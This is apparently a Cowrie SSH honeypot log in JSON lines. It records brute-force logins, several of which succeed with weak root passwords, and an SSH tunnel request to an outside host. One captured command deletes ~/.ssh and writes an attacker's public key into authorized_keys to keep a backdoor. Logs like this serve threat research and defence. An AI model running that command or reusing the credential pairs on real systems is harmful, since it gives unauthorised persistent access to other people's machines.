{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40918,"dst_ip":"1.2.3.4","dst_port":22,"session":"702eeb03e6fb","protocol":"ssh","message":"New connection: 212.227.125.160:40918 (1.2.3.4:22) [session: 702eeb03e6fb]","sensor":"my-vps","timestamp":"2025-08-31T05:16:06.607101Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:08.536209Z","src_ip":"212.227.125.160","session":"702eeb03e6fb"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:16:08.537091Z","src_ip":"212.227.125.160","session":"702eeb03e6fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56404,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7808d2818da","protocol":"ssh","message":"New connection: 212.227.235.229:56404 (1.2.3.4:22) [session: c7808d2818da]","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.494822Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.495817Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.587136Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":49756,"dst_ip":"1.2.3.4","dst_port":22,"session":"70e173df90cf","protocol":"ssh","message":"New connection: 212.227.235.229:49756 (1.2.3.4:22) [session: 70e173df90cf]","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.853726Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.862636Z","src_ip":"212.227.235.229","session":"70e173df90cf"}
{"eventid":"cowrie.login.success","username":"root","password":"Qwerty123!@#","message":"login attempt [root/Qwerty123!@#] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:16:10.995877Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:16:11.112875Z","src_ip":"212.227.235.229","session":"70e173df90cf"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:16:11.656845Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:16:11.657606Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:16:11.658386Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:11.751319Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:16:11.960262Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:16:11.961078Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.054991Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.056008Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56406,"dst_ip":"1.2.3.4","dst_port":22,"session":"e8bd72cfa773","protocol":"ssh","message":"New connection: 212.227.235.229:56406 (1.2.3.4:22) [session: e8bd72cfa773]","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.127636Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.128405Z","src_ip":"212.227.235.229","session":"e8bd72cfa773"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.209958Z","src_ip":"212.227.235.229","session":"e8bd72cfa773"}
{"eventid":"cowrie.login.failed","username":"git","password":"123456","message":"login attempt [git/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.455925Z","src_ip":"212.227.235.229","session":"70e173df90cf"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:12.579055Z","src_ip":"212.227.235.229","session":"e8bd72cfa773"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:13.662798Z","src_ip":"212.227.235.229","session":"e8bd72cfa773"}
{"eventid":"cowrie.session.closed","duration":"2.9","message":"Connection lost after 2.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:13.713361Z","src_ip":"212.227.235.229","session":"70e173df90cf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":56412,"dst_ip":"1.2.3.4","dst_port":22,"session":"4708041f5f15","protocol":"ssh","message":"New connection: 212.227.235.229:56412 (1.2.3.4:22) [session: 4708041f5f15]","sensor":"my-vps","timestamp":"2025-08-31T05:16:13.763460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:16:13.764416Z","src_ip":"212.227.235.229","session":"4708041f5f15"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:16:13.855639Z","src_ip":"212.227.235.229","session":"4708041f5f15"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:16:14.263728Z","src_ip":"212.227.235.229","session":"4708041f5f15"}
{"eventid":"cowrie.session.closed","duration":"3.9","message":"Connection lost after 3.9 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:14.356238Z","src_ip":"212.227.235.229","session":"c7808d2818da"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:14.357352Z","src_ip":"212.227.235.229","session":"4708041f5f15"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:14.614579Z","src_ip":"212.227.125.160","session":"702eeb03e6fb"}
{"eventid":"cowrie.session.closed","duration":"10.5","message":"Connection lost after 10.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:17.078348Z","src_ip":"212.227.125.160","session":"702eeb03e6fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57898,"dst_ip":"1.2.3.4","dst_port":22,"session":"640d9dc29f6e","protocol":"ssh","message":"New connection: 212.227.235.229:57898 (1.2.3.4:22) [session: 640d9dc29f6e]","sensor":"my-vps","timestamp":"2025-08-31T05:16:19.383322Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:20.265573Z","src_ip":"212.227.235.229","session":"640d9dc29f6e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:16:20.266966Z","src_ip":"212.227.235.229","session":"640d9dc29f6e"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52135,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1bc0d328c35","protocol":"ssh","message":"New connection: 212.227.125.160:52135 (1.2.3.4:22) [session: c1bc0d328c35]","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.345441Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.350021Z","src_ip":"212.227.125.160","session":"c1bc0d328c35"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":52385,"dst_ip":"1.2.3.4","dst_port":22,"session":"78f6cefc3201","protocol":"ssh","message":"New connection: 212.227.125.160:52385 (1.2.3.4:22) [session: 78f6cefc3201]","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.462270Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.463266Z","src_ip":"212.227.125.160","session":"78f6cefc3201"}
{"eventid":"cowrie.client.kex","hassh":"6a77bbd6ef48d6a9959a47aa4a42a505","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,diffie-hellman-group-exchange-sha256,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","diffie-hellman-group-exchange-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 6a77bbd6ef48d6a9959a47aa4a42a505","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.576221Z","src_ip":"212.227.125.160","session":"78f6cefc3201"}
{"eventid":"cowrie.login.success","username":"root","password":"broadguam1","message":"login attempt [root/broadguam1] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:16:21.916261Z","src_ip":"212.227.125.160","session":"78f6cefc3201"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"178.20.45.148","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to 178.20.45.148:80 from 0.0.0.0:0","sensor":"my-vps","timestamp":"2025-08-31T05:16:22.030591Z","session":"78f6cefc3201"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":37752,"dst_ip":"1.2.3.4","dst_port":22,"session":"11dcc79598ad","protocol":"ssh","message":"New connection: 212.227.235.229:37752 (1.2.3.4:22) [session: 11dcc79598ad]","sensor":"my-vps","timestamp":"2025-08-31T05:16:23.588712Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:24.335964Z","src_ip":"212.227.235.229","session":"11dcc79598ad"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:16:24.336845Z","src_ip":"212.227.235.229","session":"11dcc79598ad"}
{"eventid":"cowrie.login.failed","username":"es","password":"123","message":"login attempt [es/123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:25.904995Z","src_ip":"212.227.235.229","session":"640d9dc29f6e"}
{"eventid":"cowrie.session.closed","duration":"9.5","message":"Connection lost after 9.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:28.931481Z","src_ip":"212.227.235.229","session":"640d9dc29f6e"}
{"eventid":"cowrie.login.failed","username":"server","password":"abc123","message":"login attempt [server/abc123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:16:30.426437Z","src_ip":"212.227.235.229","session":"11dcc79598ad"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:32.159521Z","src_ip":"212.227.235.229","session":"11dcc79598ad"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":55982,"dst_ip":"1.2.3.4","dst_port":22,"session":"d29fb257c3fb","protocol":"ssh","message":"New connection: 217.72.205.35:55982 (1.2.3.4:22) [session: d29fb257c3fb]","sensor":"my-vps","timestamp":"2025-08-31T05:16:37.804505Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:16:37.805578Z","src_ip":"217.72.205.35","session":"d29fb257c3fb"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50212,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d9c8d48a0cc","protocol":"ssh","message":"New connection: 212.227.125.160:50212 (1.2.3.4:22) [session: 6d9c8d48a0cc]","sensor":"my-vps","timestamp":"2025-08-31T05:16:38.809681Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:16:39.498305Z","src_ip":"212.227.125.160","session":"6d9c8d48a0cc"}
